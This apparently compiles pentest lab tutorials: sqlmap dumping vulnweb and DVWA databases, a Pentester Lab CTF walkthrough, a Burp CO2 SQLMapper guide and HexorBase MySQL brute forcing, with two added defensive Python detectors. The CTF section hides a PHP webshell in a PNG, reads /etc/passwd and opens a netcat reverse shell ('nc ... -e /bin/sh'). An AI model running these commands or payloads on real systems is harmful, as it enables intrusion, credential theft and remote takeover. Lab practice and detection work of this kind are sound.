Easy way to Hack Database using Wizard switch in Sqlmap

Sqlmap provides a wizard option for beginners that saves a lot of time. Start your Kali Linux, open the terminal, and run the following command to use the wizard interface of sqlmap.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard

Type 1 (normal) to select the injection difficulty, then type 1 again for basic enumeration.


It automatically dumps the basic details of the backend server. From the given screenshot you can see that the web application technology is nginx with PHP 5.3.10, the operating system is Linux Ubuntu, and more.


Now raise the level and run the sqlmap wizard again with the same command.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard
Type 2 (medium) to select the injection difficulty, then type 2 again for intermediate enumeration.


Wonderful!!! We have got the database name and all table names with their columns.

Now raise the level once more and repeat the same command.

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --wizard

Type 3 (hard) to select the injection difficulty, then type 3 again for all enumeration.


Awesome! Within three steps we have got the entire information of the acuart database. You can see the result in the screenshot.


Here we have all the tables with their field and column details.

Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Hello friends!! Today we are going to solve another CTF challenge, “From SQL injection to Shell II”; you can read part 1 from here. This VM is developed by Pentester Lab. You can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell-ii,69/
Install the ISO image in VMware and start it. The task given in this lab is to gain access to the administration console and upload a PHP webshell.
Level: Intermediate
Penetrating Methodologies
§  Network Scanning (Nmap)
§  Blind Time-Based SQL Injection
§  Exploiting SQL Injection (SQLMAP)
§  Hiding Web Shell inside an Image (exiftool)
§  Uploading Web Shell
§  Spawning Shell (Netcat)

Walkthrough

The target holds 192.168.1.102 as its network IP; now let's find the open ports using nmap.
nmap -A 192.168.1.102
Since the HTTP port is open, we explored the target IP in the web browser and were welcomed by the My Awesome Photoblog web page. It contains some tags: home; test; ruxcon; 2010; all pictures; admin. Click on test.
The given URL http://192.168.1.102/cat.php?id=1 runs an SQL query for ID 1. Now let's find out whether this URL is vulnerable to SQL injection by adding an apostrophe (') at the end of the URL:
Unfortunately this page is not vulnerable to error-based SQL injection; as the author already mentions, here you will learn “Blind SQL injection exploitation using time-based exploitation. Gaining code execution using a PHP webshell”.
Then I used Acunetix to scan the target, which declared the threat level as high for blind SQL injection.
Hence it is clear that we can exploit the target through SQL injection.
After a little more research I found the way to exploit it using sqlmap.
sqlmap -u http://192.168.1.102/cat.php?id=1 --headers="X-Forwarded-For: *" --dbs --dump-all --batch
If you remember, the title of the web page was “An Awesome Photoblog”, hence the name of the database must be photoblog.
Now let's fetch all the data in the photoblog database with the following command:
sqlmap -u http://192.168.1.102/cat.php?id=1 --headers="X-Forwarded-For: *" -D photoblog --dump-all --batch
Now try to use the above credentials to access the administration console: open the target IP 192.168.0.105 in the browser again, click on the login tab, and enter admin as the login and P4ssw0rd as the password.
Congrats!!! The first task is completed.
Now the last task is to upload a PHP webshell. In the administration console you will see a link, Add a new picture, to upload an image to this web server. Click on Add a new picture to upload an image.
I tried to upload a malicious PHP file using the .php extension, the double extension .php.jpg, and case variations like PHP and pHP, but every time the backdoor failed to upload and the following web page opened.
Then I used exiftool to bind a malicious PHP file to an image, which creates a remote code execution vulnerability once it is uploaded. To do this I downloaded an image, “1.png”, and copied simple-backdoor.php from /usr/share/webshells/php/ to the desktop to bind it with the downloaded image.
Now run the following exiftool command to hide the PHP code inside the PNG image.
cd Desktop
exiftool "-comment<=simple-backdoor.php" 1.png
exiftool 1.png
As you can observe, the malicious code is hidden inside the image. 
Now I browsed to 1.png to add it as a new image; this is our PHP webshell.
Our malicious file was uploaded to the web server successfully. You can see a new row has been added as webshell php, which contains our PHP backdoor; now click on backdoor.
Yuppie! We have uploaded the image with the backdoor hidden inside; now let's try to execute it.
After inspecting the page source we found the link to the uploaded image; now let's try to open it.

As we know the image contains a web shell that allows remote code execution, after exploring the path enumerated above I tried to read the /etc/passwd file.

http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=cat+/etc/passwd
As you can observe, we have successfully pulled the passwd file, so now we can spawn the victim's shell through it.
Let's run a netcat listener in the terminal and execute a netcat reverse connection to spawn the shell.
nc -lvp 1234
http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=nc 192.168.1.105 6666 -e /bin/sh
Superb!!! We have completed our last challenge too; here we have spawned the victim's shell.
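The exiftool step above hides PHP code in the PNG's Comment text chunk, and the upload filter only looked at the file extension. As an added example (not part of the original walkthrough or of Pentester Lab's code), here is a Python check an upload handler could run on the server side: it walks the PNG chunk structure, verifies every CRC, and flags any tEXt, zTXt or iTXt chunk whose text carries a PHP or script marker. The test images are constructed inline and the tagged one carries only a harmless marker.

```python
import struct
import zlib
PNG_SIG = b"\x89PNG\r\n\x1a\n"
CODE_MARKERS = (b"<?php", b"<?=", b"<script")

def png_chunks(data):
    """Yield (type, payload) for each chunk, checking the signature and every CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) != crc:
            raise ValueError("bad CRC in %r chunk" % ctype)
        yield ctype, payload
        pos += 12 + length

def text_value(ctype, payload):
    """Return (keyword, text) for a tEXt/zTXt/iTXt chunk; zTXt and flagged iTXt are zlib-compressed."""
    keyword, rest = payload.split(b"\x00", 1)
    if ctype == b"tEXt":
        return keyword, rest
    if ctype == b"zTXt":  # one compression-method byte, then deflate data
        return keyword, zlib.decompress(rest[1:])
    flag, text = rest[0], rest[2:].split(b"\x00", 2)[2]  # iTXt: flag, method, lang, tkey, text
    return keyword, zlib.decompress(text) if flag == 1 else text

def embedded_code(data):
    """List (chunk type, keyword) for every text chunk whose value carries a code marker."""
    hits = []
    for ctype, payload in png_chunks(data):
        if ctype in (b"tEXt", b"zTXt", b"iTXt"):
            keyword, value = text_value(ctype, payload)
            if any(m in value.lower() for m in CODE_MARKERS):
                hits.append((ctype.decode(), keyword.decode()))
    return hits

def chunk(ctype, payload):
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))

def make_png(texts):
    """Constructed 1x1 RGB PNG carrying the given (keyword, text) tEXt chunks; test input only."""
    ihdr = chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    comments = b"".join(chunk(b"tEXt", k + b"\x00" + v) for k, v in texts)
    idat = chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))
    return PNG_SIG + ihdr + comments + idat + chunk(b"IEND", b"")
CLEAN_PNG = make_png([(b"Comment", b"holiday photo")])
TAGGED_PNG = make_png([(b"Comment", b"<?php /* constructed marker, not a working shell */ ?>")])
```

Flagging is only half of the fix: re-encode accepted images to drop all metadata, and make sure nothing under the upload directory is ever handed to the PHP interpreter, since the request above reaches cmd.php through the image's path.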


SQL Injection Exploitation in Multiple Targets using Sqlmap

In this article we are going to perform an SQL injection attack on multiple targets with sqlmap.

In this tutorial I used two buggy web applications: DVWA and Acuart (vulnweb.com).


Start DVWA and select the SQL Injection vulnerability; type a user ID, click on submit, and copy the URL.


Start Kali Linux, then create a text file named sql.txt on the desktop that will hold the URLs of multiple targets, and paste the copied URL into it. From the screenshot you can see that I pasted the above URL into this text file and saved it as sql.txt.

Repeat the same process with a different web application. Open vulnweb.com and click on the URL given for Acuart.


Now click on browse categories, then click on poster.


Now let's verify whether the ID is vulnerable to SQL injection. Add an apostrophe (') at the end of the URL as shown in the screenshot. You can see I received an error message, which means the ID is vulnerable to SQL injection. Copy its URL.


Paste the copied URL into sql.txt and save it again. So now two URLs are saved in the text file, i.e. two vulnerable IDs from different web applications are stored in sql.txt.


Open the terminal and type the following command to scan multiple targets for SQL injection with sqlmap.
sqlmap -m /root/Desktop/sql.txt --dbs --batch


So here you can see I got database names for multiple targets. Here I found dvwa among the database names.


Later I got another database name, acuart. Now try it yourself with multiple IDs.
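The sqlmap runs in the wizard section and here, and the apostrophe probe above, all leave recognisable traces in the web server's access log. As an added example that is not part of this article, the Python below parses combined-format log lines (constructed samples included), URL-decodes the query string, and reports the client IPs that sent sqlmap's user-agent, time-based payloads such as SLEEP(), boolean/union probes, or a trailing quote.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" access log format; the sample lines below are constructed.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Time-based blind payloads (the technique used against the photoblog), boolean/union probes,
# and the bare quote probe used to spot error-based injection.
TIME_BASED = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
BOOL_UNION = re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+|\bunion\b\s+(all\s+)?select\b", re.I)
QUOTE_PROBE = re.compile(r"""['"]\s*(--|#|/\*|$)""")

def classify(line):
    """Return (client ip, reasons) for one log line, or None if it is not a combined-format line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote_plus(m["path"]).partition("?")[2]  # decode %27, + and %20 before matching
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    if TIME_BASED.search(query):
        reasons.append("time-based payload")
    if BOOL_UNION.search(query):
        reasons.append("boolean/union payload")
    elif QUOTE_PROBE.search(query):
        reasons.append("quote probe")
    return m["ip"], reasons

def suspicious_sources(lines):
    """Map each client IP that triggered at least one reason to its sorted list of reasons."""
    seen = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[1]:
            seen.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(r) for ip, r in seen.items()}

# Constructed sample: one client probes cat.php with a quote and then runs sqlmap; another is normal.
SAMPLE_LOG = [
    '192.168.1.105 - - [13/Aug/2018:16:19:57 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '192.168.1.105 - - [13/Aug/2018:16:20:01 +0000] "GET /cat.php?id=1%27 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '192.168.1.105 - - [13/Aug/2018:16:20:09 +0000] "GET /cat.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 1843 "-" "sqlmap/1.2 (constructed)"',
    '10.0.0.7 - - [13/Aug/2018:16:21:00 +0000] "GET /cat.php?id=2 HTTP/1.1" 200 1501 "-" "Mozilla/5.0"',
]
```

The photoblog injection point was the X-Forwarded-For header, which the combined format does not record, so log that header (or the full request) as well or this check only sees query-string payloads.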

Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin)

Burp CO2 is an extension for the popular web proxy / web application testing tool called Burp Suite, available at Portswigger. You must install Burp Suite before installing the Burp CO2 extension. The CO2 extension includes a variety of functionality to enhance certain web penetration test tasks, such as an interface to make interacting with SQLMap more efficient and less error-prone, various tools for generating lists of users, a Laudanum exploitation shell implementation, and even a word masher for generating passwords.

For more details read burpco2.com.
In this article I will show you how to obtain an sqlmap command through Burp Suite for SQL injection.
Start Burp Suite and click on the Extender tab, then click on the BApp Store, which contains Burp extensions that extend Burp's capabilities.


Now select CO2 and click on the Install button on the right side of the frame.

From the given screenshot you can see that the CO2 extension has been added to the menu bar; now click on CO2 and choose the SQLMapper tool.


Now open DVWA on your PC and log in with the following credentials:

Username – admin
Password – password

Click on DVWA Security and set the website security level to low.

From the list of vulnerabilities select SQL Injection for your attack. Type user ID: ' in the text box. Don't click on the submit button before setting the browser proxy; set your browser proxy so Burp Suite can intercept the request.


Go to Burp Suite, click on Proxy in the menu bar and make sure Intercept is on. Come back and click on the submit button in DVWA. The Intercept tab displays the HTTP and WebSocket messages that pass between your browser and web servers.

Now right-click in its window; a list of actions opens, and from it select Send to SQLMapper.


When the captured request is sent to SQLMapper, it automatically generates the sqlmap command using the referrer and cookie.


Here you can see the options box at the bottom of the Burp Suite frame. Click on the Enumeration tab and select the checkboxes for database, tables, columns, users and passwords.

Now copy the sqlmap command from the text field and run it manually in a terminal with sqlmap.


Open the terminal and paste the above command after “sqlmap”, as shown in the screenshot. Now run this command to fetch the database information.


From this tutorial it is clear how to generate an sqlmap command through Burp Suite for SQL injection. In the last image you can see it start dumping the data.

Brute Forcing Multiple Databases using HexorBase

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and brute force attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase allows packet routing through proxies or even Metasploit pivoting antics to communicate with remotely inaccessible servers hidden within local subnets.


To run HexorBase in Kali Linux, click Applications > Database Assessment > hexorbase.


Alternatively, open the terminal and type hexorbase.

It opens the graphical interface of HexorBase, as shown in the screenshot. It lists several database server types, and you can launch a brute force attack against the one you choose.


Now, to start a brute force attack, first you need to create an account. In the middle you can see the administration panel; type a username and password of your choice here. I typed admin:pass as the username and password, which allows me to start a brute force attack with HexorBase against the chosen backend server.


Now choose your database type. I selected MySQL for the brute force attack.


Now follow these few steps to brute force the server.

·  Type the target IP 192.168.1.104 under database connection.
·  Click on the user list for the dictionary attack option and select a dictionary of usernames.
·  Repeat the above step for the word list to select a password list.
·  Finally, click on launch attack to start the brute force attack.


Now it will try the username and password combinations against the target IP. After some time, when the process is 100% complete, you will get the matched combination as the result. You can see from the screenshot that I got the username and password combination msfadmin:msfadmin for the MySQL server.